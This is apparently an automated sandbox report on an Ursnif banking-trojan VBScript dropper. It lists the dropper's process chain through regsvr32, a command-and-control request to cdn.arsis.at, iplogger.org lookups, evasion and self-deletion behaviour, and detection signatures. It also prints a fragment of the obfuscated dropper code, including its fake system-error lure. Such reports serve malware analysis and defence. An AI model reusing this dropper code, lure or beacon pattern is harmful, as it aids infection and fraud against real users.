Loading ...

Play interactive tourEdit tour

Analysis Report description#_02923.vbs

Overview

General Information

Sample Name:description#_02923.vbs
MD5:de25f443cc3bd5ccf14d1b514e909bb3
SHA1:a74c82a1b059e4be6a234920092440948e40faf0
SHA256:1dcd128cc38a01779a240eeaec7b498107509e15f5d806c483644d9c1e4b9b8b

Most interesting Screenshot:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Benign windows process drops PE files
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Yara detected Ursnif
Creates a COM Internet Explorer object
Creates processes via WMI
Deletes itself after installation
Machine Learning detection for dropped file
Sigma detected: Regsvr32 Anomaly
Writes or reads registry keys via WMI
Writes registry values via WMI
Abnormal high CPU Usage
Contains functionality locales information (e.g. system language)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found evasive API chain checking for process token information
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w10x64
  • wscript.exe (PID: 4616 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\description#_02923.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • regsvr32.exe (PID: 3688 cmdline: regsvr32 -s C:\Users\user\AppData\Local\Temp\qua.xpi MD5: D78B75FC68247E8A63ACBA846182740E)
    • regsvr32.exe (PID: 3488 cmdline: -s C:\Users\user\AppData\Local\Temp\qua.xpi MD5: 426E7499F6A7346F0410DEAD0805586B)
  • iexplore.exe (PID: 5136 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 6056 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5136 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000003.1075489749.0000000005168000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000003.00000003.1075693609.0000000005168000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000003.00000002.1194926522.0000000005168000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000003.00000003.1075767808.0000000005168000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          00000003.00000003.1075566551.0000000005168000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            Click to see the 5 entries

            Sigma Overview


            System Summary:

            barindex
            Sigma detected: Regsvr32 AnomalyShow sources
            Source: Process startedAuthor: Florian Roth: Data: Command: -s C:\Users\user\AppData\Local\Temp\qua.xpi, CommandLine: -s C:\Users\user\AppData\Local\Temp\qua.xpi, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: regsvr32 -s C:\Users\user\AppData\Local\Temp\qua.xpi, ParentImage: C:\Windows\System32\regsvr32.exe, ParentProcessId: 3688, ProcessCommandLine: -s C:\Users\user\AppData\Local\Temp\qua.xpi, ProcessId: 3488

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Multi AV Scanner detection for domain / URLShow sources
            Source: cdn.arsis.atVirustotal: Detection: 6%Perma Link
            Multi AV Scanner detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Local\Temp\qua.xpiVirustotal: Detection: 22%Perma Link
            Source: C:\Users\user\AppData\Local\Temp\qua.xpiReversingLabs: Detection: 45%
            Multi AV Scanner detection for submitted fileShow sources
            Source: description#_02923.vbsVirustotal: Detection: 13%Perma Link
            Source: description#_02923.vbsReversingLabs: Detection: 14%
            Machine Learning detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Local\Temp\qua.xpiJoe Sandbox ML: detected

            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_02AB258E Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Local\Temp
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Local
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Documents\desktop.ini
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Desktop\desktop.ini
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData

            Networking:

            barindex
            Creates a COM Internet Explorer objectShow sources
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAs
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler
            Source: Joe Sandbox ViewIP Address: 47.241.8.147 47.241.8.147
            Source: Joe Sandbox ViewIP Address: 88.99.66.31 88.99.66.31
            Source: Joe Sandbox ViewIP Address: 88.99.66.31 88.99.66.31
            Source: Joe Sandbox ViewASN Name: unknown unknown
            Source: Joe Sandbox ViewJA3 fingerprint: ce5f3254611a8c095a3d821d44539877
            Source: global trafficHTTP traffic detected: GET /api1/kavq20141UbTiMI/D1bYgxGqLXWXburuip/wRxkKnN2R/bAB7_2FyKfxN5qY0jr8G/SM7fP8YVqb4g_2BVVqt/tZUJwJyGXQhcto0P1kyrir/rgT4EnFKzg83S/IEYvtQeG/dFBcYYUBt5YkQ3_2FXN9h28/_2Bcnv7T6c/wiACIVMWAOU8kb7mG/1_2BEgNp7naW/sf7RBC82nnz/3UZaJHtR2QAVcb/G2o59qF6QItsK4t2bJrWD/VevZnNOZ6K4hvNML/63Y4HPK2zFEXcK_/0A_0D9HpzaL8HOZGvb/PTtBbjnLR/_2BJ_2Be3RUUV3ws0qSm/hsW_2B7c/nBj HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: cdn.arsis.atConnection: Keep-Alive
            Source: msapplication.xml0.11.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xe101779e,0x01d64a99</date><accdate>0xe101779e,0x01d64a99</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
            Source: msapplication.xml0.11.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xe101779e,0x01d64a99</date><accdate>0xe101779e,0x01d64a99</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
            Source: msapplication.xml5.11.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xe108eaed,0x01d64a99</date><accdate>0xe108eaed,0x01d64a99</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
            Source: msapplication.xml5.11.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xe108eaed,0x01d64a99</date><accdate>0xe10b6080,0x01d64a99</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
            Source: msapplication.xml7.11.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xe10dd60a,0x01d64a99</date><accdate>0xe10dd60a,0x01d64a99</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
            Source: msapplication.xml7.11.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xe10dd60a,0x01d64a99</date><accdate>0xe10dd60a,0x01d64a99</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
            Source: unknownDNS traffic detected: queries for: iplogger.org
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 24 Jun 2020 17:39:11 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 37 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 2a 24 a5 27 e7 e7 e4 17 d9 2a 95 67 64 96 a4 2a 81 c4 93 53 f3 4a 52 8b ec 6c 32 0c d1 4d 00 8a d8 e8 43 a5 41 76 01 15 41 79 79 e9 99 79 15 c8 72 fa 20 d3 c1 0c a8 cb 00 90 3b 34 31 a2 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 7b(HML),I310Q/Qp/K&T*$'*gd*SJRl2MCAvAyyyr ;410
            Source: wscript.exe, 00000000.00000002.823221866.0000020AC1740000.00000004.00000020.sdmpString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
            Source: wscript.exe, 00000000.00000002.823221866.0000020AC1740000.00000004.00000020.sdmpString found in binary or memory: http://cert.int-x3.letsencrypt.org/0
            Source: wscript.exe, 00000000.00000002.823221866.0000020AC1740000.00000004.00000020.sdmpString found in binary or memory: http://cps.letsencrypt.org0
            Source: wscript.exe, 00000000.00000002.823221866.0000020AC1740000.00000004.00000020.sdmpString found in binary or memory: http://cps.root-x1.letsencrypt.org0
            Source: wscript.exe, 00000000.00000002.823221866.0000020AC1740000.00000004.00000020.sdmpString found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
            Source: wscript.exe, 00000000.00000002.823221866.0000020AC1740000.00000004.00000020.sdmpString found in binary or memory: http://isrg.trustid.ocsp.identrust.com0;
            Source: wscript.exe, 00000000.00000002.823221866.0000020AC1740000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.int-x3.letsencrypt.org0/
            Source: msapplication.xml.11.drString found in binary or memory: http://www.amazon.com/
            Source: msapplication.xml1.11.drString found in binary or memory: http://www.google.com/
            Source: msapplication.xml2.11.drString found in binary or memory: http://www.live.com/
            Source: msapplication.xml3.11.drString found in binary or memory: http://www.nytimes.com/
            Source: msapplication.xml4.11.drString found in binary or memory: http://www.reddit.com/
            Source: msapplication.xml5.11.drString found in binary or memory: http://www.twitter.com/
            Source: msapplication.xml6.11.drString found in binary or memory: http://www.wikipedia.com/
            Source: msapplication.xml7.11.drString found in binary or memory: http://www.youtube.com/
            Source: wscript.exe, 00000000.00000003.805204256.0000020AC75D1000.00000004.00000001.sdmp, wscript.exe, 00000000.00000002.826782340.0000020AC78BF000.00000004.00000001.sdmpString found in binary or memory: https://iplogger.org/
            Source: wscript.exe, 00000000.00000003.821482711.0000020AC43C5000.00000004.00000001.sdmpString found in binary or memory: https://iplogger.org/1bD467
            Source: wscript.exe, 00000000.00000002.824643402.0000020AC43BE000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.805310992.0000020AC7614000.00000004.00000001.sdmp, wscript.exe, 00000000.00000002.825367827.0000020AC54C5000.00000004.00000001.sdmpString found in binary or memory: https://iplogger.org/1bP467
            Source: wscript.exe, 00000000.00000002.826782340.0000020AC78BF000.00000004.00000001.sdmpString found in binary or memory: https://iplogger.org/BP
            Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735

            Key, Mouse, Clipboard, Microphone and Screen Capturing:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000003.00000003.1075489749.0000000005168000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1075693609.0000000005168000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1194926522.0000000005168000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1075767808.0000000005168000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1075566551.0000000005168000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1075739396.0000000005168000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1075639616.0000000005168000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1075243511.0000000005168000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1075382255.0000000005168000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 3488, type: MEMORY

            E-Banking Fraud:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000003.00000003.1075489749.0000000005168000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1075693609.0000000005168000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1194926522.0000000005168000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1075767808.0000000005168000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1075566551.0000000005168000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1075739396.0000000005168000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1075639616.0000000005168000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1075243511.0000000005168000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1075382255.0000000005168000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 3488, type: MEMORY

            System Summary:

            barindex
            Writes or reads registry keys via WMIShow sources
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Writes registry values via WMIShow sources
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess Stats: CPU usage > 98%
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_72E215F3 NtMapViewOfSection,
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_72E218DB NtCreateSection,memset,
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_72E22775 NtQueryVirtualMemory,
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_02AB3A67 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_02ABAEB5 NtQueryVirtualMemory,
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_72E22554
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_02ABAC94
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_02AB15D6
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\qua.xpi 49FC4C06CF9FFA149CE9D9D03F354197B54B605291FC94835FAB1ABE9E9C9626
            Source: description#_02923.vbsInitial sample: Strings found which are bigger than 50
            Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dll
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dll
            Source: classification engineClassification label: mal100.bank.troj.evad.winVBS@7/16@2/2
            Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\HighJump to behavior
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\adobe.urlJump to behavior
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\description#_02923.vbs'
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Windows\System32\wscript.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: description#_02923.vbsVirustotal: Detection: 13%
            Source: description#_02923.vbsReversingLabs: Detection: 14%
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\description#_02923.vbs'
            Source: unknownProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -s C:\Users\user\AppData\Local\Temp\qua.xpi
            Source: unknownProcess created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\qua.xpi
            Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5136 CREDAT:17410 /prefetch:2
            Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\qua.xpi
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5136 CREDAT:17410 /prefetch:2
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: description#_02923.vbsStatic file information: File size 1079613 > 1048576
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_171\bin\msvcr100.dll
            Source: Binary string: c:\Quite\pitch\east\And\Even\start\middle\next.pdb source: wscript.exe, 00000000.00000003.796072440.0000020AC43DE000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000002.1195202541.0000000072E4A000.00000002.00020000.sdmp, qua.xpi.0.dr

            Data Obfuscation:

            barindex
            VBScript performs obfuscated calls to suspicious functionsShow sources
            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.ScriptName, cStr(270546191)) > 0 And dMGq = 0) ThenExit FunctionEnd IfJDE = 15if (JDE > ((53 - 6.0) + (-(48 - (35 + (-24.0)))))) Thenflw = Array(203)Dim neuron:Set neuron = CreateObject("WScript.Shell")sqTSE = neuron.RegRead("HKEY_CURRENT_USER\Control Panel\International\Geo\Nation")For Each hind In flwIf (hind = Cint(sqTSE)) ThenREM Steven mulatto technology resiny Bauhaus Cummins conservator. cumbersome Strom hasp mandrill too procaine extirpate sergeant, 6138352 Judaism sale typewritten farmhouse deuteron Malagasy delineate gossamer adolescent, marital Ferguson homogeneity. evaporate Ephraim hair, 7115897 failure. Platonism decode antiquarian, 5508839 militia embargo director coruscate wreath40("")BlombergFujitsuWScript.Quit' flatulent Frye sinew Ulster Debussy spectrometer parade Carbone, Thoreau anyone Grayson polecat panther Morrison apache psychophysic, whimsey executrix Dailey sucrose buxom memory victim flipflop inboard. 1947492 emphatic fluorite Greenbelt End IfNext' progress buteo fungicide nameplate Bolton mockernut Gilchrist click sexy, beady. myocardial phalarope sigma Dorado lump umbra Alton246 wilful foxhole103 psychosomatic ironbound forgo cubit stratospheric motive, 2477469 shift chief Nigeria End ifEnd FunctionFunction Fujitsu()inventive = MsgBox("The program cant start because MSVCR100.dll is missing from your computer. Try reinstalling the program to fix this problem.", vbSystemModal+vbCritical, "System Error")End FunctionFunction zJOk()REM foothill807 seraphim tarnish Levis. figaro rambunctious fail doomsday disembowel bug permute315 seder sabra whatever morsel bottle ingather curb entrant pudding, 771336 phobic mystic methyl. inapt on error resume next' hydrodynamic. 2432209 airflow chromosomal Jacques those millenarian Lynn trivia. 7572830 Janus happen303 jackdaw. aliphatic aggregate Rosetta Tarrytown McLeod bookmark medic902 relevant Caracas Hindu cadre cannel Barrett bookbind soar shortcoming, Pauli If (InStr(WScript.ScriptName, cStr(270546191)) > 0 And dMGq = 0) ThenExit FunctionEnd Ifset SxK = GetObject("winmgmts:\\.\root\cimv2")set jPuBlOS = SxK.InstancesOf("Win32_OperatingSystem")REM thou impartation Welles ibid arsenide mediate autopsy deprave soar435 majestic, 7805098 candlelight broad Formosa rotary handbook sweep Blackwell jive sandwich automorphism. hereditary lovebird, 2350665 woodcut develop evocate peanut blitz solipsism impasse symbolic riverbank ventilate searchlight orthodontic detriment oratoric vacuole for each surmount in jPuBlOS' eggplant, 1640424 beehive stinkbug Matson laconic chianti visitor. 6763580 failsafe Strickland triphammer glandular parabola mannitol ANSI Dow megabyte. quota deed wigging. Toni = surmount.LastBootUpTimeREM season hillock grief Dairylea jejune slurry, 2899406 Kaufman colonel pragmatic packet Hellenic545 veterinary. Rockefeller polymeric bough Bahama life Waterman common businessmen dolce hunk Bridget. inhabitant deformation polyandrous market Katowice anam
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_72E224F0 push ecx; ret
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_72E22543 push ecx; ret
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_02ABAC83 push ecx; ret
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_02ABED26 pushfd ; retf
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_02ABA950 push ecx; ret
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_72E356F4 push es; iretd
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_72E35EC4 push dword ptr [ebp+597C1BE8h]; retf
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_72E37A7B push ebp; ret
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_72E38003 push ebp; iretd
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_72E347EE push edi; ret
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_72E37BD0 push ebp; iretd
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_72E34F90 push ecx; ret
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_72E627E2 push ds; retf
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_72E6237B push edx; ret

            Persistence and Installation Behavior:

            barindex
            Creates processes via WMIShow sources
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\qua.xpiJump to dropped file
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\qua.xpiJump to dropped file

            Hooking and other Techniques for Hiding and Protection:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000003.00000003.1075489749.0000000005168000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1075693609.0000000005168000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1194926522.0000000005168000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1075767808.0000000005168000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1075566551.0000000005168000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1075739396.0000000005168000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1075639616.0000000005168000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1075243511.0000000005168000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1075382255.0000000005168000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 3488, type: MEMORY
            Deletes itself after installationShow sources
            Source: C:\Windows\System32\wscript.exeFile deleted: c:\users\user\desktop\description#_02923.vbsJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOX

            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
            Source: C:\Windows\SysWOW64\regsvr32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
            Source: C:\Windows\System32\wscript.exe TID: 3836Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\SysWOW64\regsvr32.exeLast function: Thread delayed
            Source: C:\Windows\System32\wscript.exeFile Volume queried: C:\Users\user\AppData\Local FullSizeInformation
            Source: C:\Windows\System32\wscript.exeFile Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_02AB258E Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Local\Temp
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Local
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Documents\desktop.ini
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Desktop\desktop.ini
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData
            Source: wscript.exe, 00000000.00000002.827105716.0000020AC82D0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
            Source: wscript.exe, 00000000.00000003.804609988.0000020AC54DB000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
            Source: wscript.exe, 00000000.00000002.827105716.0000020AC82D0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
